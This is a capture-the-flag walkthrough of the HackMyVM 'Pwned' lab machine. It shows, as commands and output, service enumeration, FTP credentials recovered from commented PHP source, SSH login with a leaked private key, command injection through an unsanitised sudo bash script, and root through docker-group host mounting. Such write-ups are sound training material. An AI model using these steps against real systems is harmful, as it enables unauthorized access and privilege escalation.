HackMyVM - Pwned

You can start playing there > HackMyVM

Summary

We start by finding a wordlist we save it and we brute force with it, this gives us FTP creds. FTP provide us the user and her SSH private key. First privesc is about a bash script function exploitation & the final one is about docker group. Let’s pwn it! :sunglasses:

Enumeration/Reconnaissance

Let’s start as always with nmap.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
$ ip=192.168.1.18
$ nmap -p- --min-rate 10000 $ip 
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-01 12:51 EEST
Nmap scan report for pwned.zte.com.cn (192.168.1.18)
Host is up (0.00040s latency).
Not shown: 65532 closed ports
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:2D:DE:08 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 2.17 seconds
$ nmap -p 21,22,80 -sC -sV -oN nmap/initial $ip
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-01 12:51 EEST
Nmap scan report for pwned.zte.com.cn (192.168.1.18)
Host is up (0.00039s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 fe:cd:90:19:74:91:ae:f5:64:a8:a5:e8:6f:6e:ef:7e (RSA)
|   256 81:32:93:bd:ed:9b:e7:98:af:25:06:79:5f:de:91:5d (ECDSA)
|_  256 dd:72:74:5d:4d:2d:a3:62:3e:81:af:09:51:e0:14:4a (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Pwned....!!

Let’s start the enumeration with port 80 with a gobuster scan.

1
2
3
4
5
6
$ gobuster dir -q -u http://$ip/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,txt,html
/index.html (Status: 200)
/robots.txt (Status: 200)
/nothing (Status: 301)
/server-status (Status: 403)
/hidden_text (Status: 301)

/hidden_text directory has a file in with a wordlist, let’s save it into a .txt and run dirb with it.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
$ curl http://192.168.1.18/hidden_text/secret.dic | tee wordlist.txt
$ dirb http://$ip/ wordlist.txt 

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Thu Oct  1 13:17:42 2020
URL_BASE: http://192.168.1.18/
WORDLIST_FILES: wordlist.txt

-----------------

GENERATED WORDS: 21                                                            

---- Scanning URL: http://192.168.1.18/ ----
+ http://192.168.1.18//pwned.vuln (CODE:301|SIZE:317)               

/pwned.vuln has a login page but if we check the source code we can detect some ftp creds:

1
2
3
4
5
6
7
8
9
10
11
12
13
<?php
//	if (isset($_POST['submit'])) {
//		$un=$_POST['username'];
//		$pw=$_POST['password'];
//
//	if ($un=='ftpuser' && $pw=='B0ss_B!TcH') {
//		echo "welcome"
//		exit();
// }
// else 
//	echo "Invalid creds"
// }
?>

Shell as ariana

Now we can login as ftpuser:B0ss_B!TcH on FTP, after we login in let’s download all the files:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
$ ftp $ip
Connected to 192.168.1.18.
220 (vsFTPd 3.0.3)
Name (192.168.1.18:root): ftpuser
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 0        0            4096 Jul 10 12:47 share
226 Directory send OK.
ftp> cd share
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 0        0            2602 Jul 09 15:05 id_rsa
-rw-r--r--    1 0        0              75 Jul 09 17:41 note.txt
226 Directory send OK.
ftp> get id_rsa
local: id_rsa remote: id_rsa
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for id_rsa (2602 bytes).
226 Transfer complete.
2602 bytes received in 0.00 secs (3.5756 MB/s)
ftp> get note.txt
local: note.txt remote: note.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for note.txt (75 bytes).
226 Transfer complete.
75 bytes received in 0.00 secs (85.9650 kB/s)
ftp> exit

note.txt provide us a username:

1
2
3
4
5
Wow you are here 

ariana won't happy about this note 

sorry ariana :( 

Let’s use the ssh private key with user ariana to connect on server:

1
2
3
4
5
6
$ chmod 600 id_rsa
$ ssh -i id_rsa ariana@$ip

ariana@pwned:~$ whoami;id
ariana
uid=1000(ariana) gid=1000(ariana) groups=1000(ariana),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth)

Shell as selena

If we run sudo -l we can run a bash script file as selena:

1
2
3
4
5
6
ariana@pwned:~$ sudo -l
Matching Defaults entries for ariana on pwned:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User ariana may run the following commands on pwned:
    (selena) NOPASSWD: /home/messenger.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
#!/bin/bash

clear
echo "Welcome to linux.messenger "
		echo ""
users=$(cat /etc/passwd | grep home |  cut -d/ -f 3)
		echo ""
echo "$users"
		echo ""
read -p "Enter username to send message : " name 
		echo ""
read -p "Enter message for $name :" msg
		echo ""
echo "Sending message to $name "

$msg 2> /dev/null

		echo ""
echo "Message sent to $name :) "
		echo ""

We can simply exploit the read function just by entering the command we want:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
ariana@pwned:~$ sudo -u selena /home/messenger.sh
Welcome to linux.messenger 


ariana:
selena:
ftpuser:

Enter username to send message : bash

Enter message for bash :bash

Sending message to bash 
python3 -c 'import pty;pty.spawn("/bin/bash")'
selena@pwned:/home/ariana$ whoami;id
selena
uid=1001(selena) gid=1001(selena) groups=1001(selena),115(docker)

Shell as root

Privesc to root is simple, selena is in docker group so we can simply exploit this:

1
2
selena@pwned:/home/ariana$ groups
selena docker
1
2
3
4
5
6
7
selena@pwned:/home/ariana$ docker run -v /:/hostOS -i -t chrisfosterelli/rootplease

You should now have a root shell on the host OS
Press Ctrl-D to exit the docker instance / shell
# whoami;id
root
uid=0(root) gid=0(root) groups=0(root)

Let’s read the flags:

1
2
3
4
# cat root.txt | head -1 | cut -c1-10
4d4098d64e
# cat user1.txt | sed -n 5p | cut -c1-10
fb8d98be12

Really cool VM! :fire: